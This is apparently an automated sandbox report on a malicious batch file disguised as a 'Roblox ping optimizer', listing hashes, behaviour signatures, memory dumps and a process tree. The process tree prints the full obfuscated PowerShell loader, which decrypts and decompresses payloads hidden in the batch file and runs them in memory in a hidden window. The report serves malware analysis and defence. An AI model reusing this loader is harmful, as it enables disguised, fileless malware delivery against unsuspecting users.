Analysis

  • max time kernel
    52s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27-06-2024 23:51

General

  • Target

    RobloxPingOptimizer.bat

  • Size

    273KB

  • MD5

    0d3e0553b13ae24b0e765dc71b71d157

  • SHA1

    2e7ea67463d79b9047aa843210667ac11da4650d

  • SHA256

    3d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6

  • SHA512

    43b0250496746f8c161d3009f0842d2758eb80196ce7bc5e4f05a1ac552ae86ebece4fcb42a6b4f52be7981e01782817c56d12017d70c77e34327f63433a5da0

  • SSDEEP

    6144:ymjeUWzu9cgBXKz1IQDKHkaIFH4zfWHF0QR1rh3Og2q4E:yseUWq9cgBazioKkaIEfOFtR1rh3Z2S

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1wL4kmOdB2R3iGa/mEDXbQunvSUVKGrVuRrft2dp9pw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BFwaf2FXZug80opDTZLBSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HKEwQ=New-Object System.IO.MemoryStream(,$param_var); $kVcOJ=New-Object System.IO.MemoryStream; $eLOZz=New-Object System.IO.Compression.GZipStream($HKEwQ, [IO.Compression.CompressionMode]::Decompress); $eLOZz.CopyTo($kVcOJ); $eLOZz.Dispose(); $HKEwQ.Dispose(); $kVcOJ.Dispose(); $kVcOJ.ToArray();}function execute_function($param_var,$param2_var){ $YpwEB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnPgt=$YpwEB.EntryPoint; $XnPgt.Invoke($null, $param2_var);}$tHcqT = 'C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat';$host.UI.RawUI.WindowTitle = $tHcqT;$AjwOC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tHcqT).Split([Environment]::NewLine);foreach ($vriJL in $AjwOC) { if ($vriJL.StartsWith('jwbKUUEoLPvvJlZYWdJd')) { $srAUX=$vriJL.Substring(20); break; }}$payloads_var=[string[]]$srAUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:2020
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2360
    • C:\Windows\System32\fontview.exe
      "C:\Windows\System32\fontview.exe" C:\Users\Admin\Desktop\ResolveOpen.ttf
      1⤵
        PID:2540
      • C:\Windows\System32\fontview.exe
        "C:\Windows\System32\fontview.exe" C:\Users\Admin\Desktop\ResolveOpen.ttf
        1⤵
          PID:2600
        • C:\Program Files\VideoLAN\VLC\vlc.exe
          "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\TestRegister.3gp2"
          1⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          PID:2672
        • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
          "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde /n
          1⤵
          • Enumerates system info in registry
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          PID:2504
        • C:\Windows\System32\isoburn.exe
          "C:\Windows\System32\isoburn.exe" "C:\Users\Admin\Desktop\MergeMount.iso"
          1⤵
            PID:2736

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/2360-2-0x0000000074521000-0x0000000074522000-memory.dmp

            Filesize

            4KB

          • memory/2360-3-0x0000000074520000-0x0000000074ACB000-memory.dmp

            Filesize

            5.7MB

          • memory/2360-4-0x0000000074520000-0x0000000074ACB000-memory.dmp

            Filesize

            5.7MB

          • memory/2360-6-0x0000000074520000-0x0000000074ACB000-memory.dmp

            Filesize

            5.7MB

          • memory/2360-5-0x0000000074520000-0x0000000074ACB000-memory.dmp

            Filesize

            5.7MB

          • memory/2360-7-0x0000000074520000-0x0000000074ACB000-memory.dmp

            Filesize

            5.7MB

          • memory/2504-14-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2672-16-0x000007FEF79E0000-0x000007FEF7A14000-memory.dmp

            Filesize

            208KB

          • memory/2672-15-0x000000013F1D0000-0x000000013F2C8000-memory.dmp

            Filesize

            992KB

          • memory/2672-17-0x000007FEF6920000-0x000007FEF6BD4000-memory.dmp

            Filesize

            2.7MB

          • memory/2672-18-0x000007FEF8370000-0x000007FEF8388000-memory.dmp

            Filesize

            96KB

          • memory/2672-20-0x000007FEF79A0000-0x000007FEF79B1000-memory.dmp

            Filesize

            68KB

          • memory/2672-21-0x000007FEF7980000-0x000007FEF7997000-memory.dmp

            Filesize

            92KB

          • memory/2672-24-0x000007FEF7920000-0x000007FEF7931000-memory.dmp

            Filesize

            68KB

          • memory/2672-23-0x000007FEF7940000-0x000007FEF795D000-memory.dmp

            Filesize

            116KB

          • memory/2672-22-0x000007FEF7960000-0x000007FEF7971000-memory.dmp

            Filesize

            68KB

          • memory/2672-19-0x000007FEF79C0000-0x000007FEF79D7000-memory.dmp

            Filesize

            92KB

          • memory/2672-25-0x000007FEF5740000-0x000007FEF67EB000-memory.dmp

            Filesize

            16.7MB

          • memory/2672-26-0x000007FEF5540000-0x000007FEF5740000-memory.dmp

            Filesize

            2.0MB

          • memory/2672-28-0x000007FEF7030000-0x000007FEF7051000-memory.dmp

            Filesize

            132KB

          • memory/2672-30-0x000007FEF6FF0000-0x000007FEF7001000-memory.dmp

            Filesize

            68KB

          • memory/2672-32-0x000007FEF6FB0000-0x000007FEF6FC1000-memory.dmp

            Filesize

            68KB

          • memory/2672-31-0x000007FEF6FD0000-0x000007FEF6FE1000-memory.dmp

            Filesize

            68KB

          • memory/2672-33-0x000007FEF6F90000-0x000007FEF6FAB000-memory.dmp

            Filesize

            108KB

          • memory/2672-38-0x000007FEF5430000-0x000007FEF549F000-memory.dmp

            Filesize

            444KB

          • memory/2672-42-0x000007FEF5350000-0x000007FEF5374000-memory.dmp

            Filesize

            144KB

          • memory/2672-47-0x000007FEF2C70000-0x000007FEF2C87000-memory.dmp

            Filesize

            92KB

          • memory/2672-46-0x000007FEF52C0000-0x000007FEF52D2000-memory.dmp

            Filesize

            72KB

          • memory/2672-45-0x000007FEF52E0000-0x000007FEF52F1000-memory.dmp

            Filesize

            68KB

          • memory/2672-44-0x000007FEF5300000-0x000007FEF5323000-memory.dmp

            Filesize

            140KB

          • memory/2672-43-0x000007FEF5330000-0x000007FEF5347000-memory.dmp

            Filesize

            92KB

          • memory/2672-41-0x000007FEF5380000-0x000007FEF53A8000-memory.dmp

            Filesize

            160KB

          • memory/2672-40-0x000007FEF53B0000-0x000007FEF5406000-memory.dmp

            Filesize

            344KB

          • memory/2672-39-0x000007FEF5410000-0x000007FEF5421000-memory.dmp

            Filesize

            68KB

          • memory/2672-37-0x000007FEF54A0000-0x000007FEF5507000-memory.dmp

            Filesize

            412KB

          • memory/2672-36-0x000007FEF5510000-0x000007FEF5540000-memory.dmp

            Filesize

            192KB

          • memory/2672-35-0x000007FEF6F50000-0x000007FEF6F68000-memory.dmp

            Filesize

            96KB

          • memory/2672-34-0x000007FEF6F70000-0x000007FEF6F81000-memory.dmp

            Filesize

            68KB

          • memory/2672-29-0x000007FEF7010000-0x000007FEF7028000-memory.dmp

            Filesize

            96KB

          • memory/2672-27-0x000007FEF78E0000-0x000007FEF791F000-memory.dmp

            Filesize

            252KB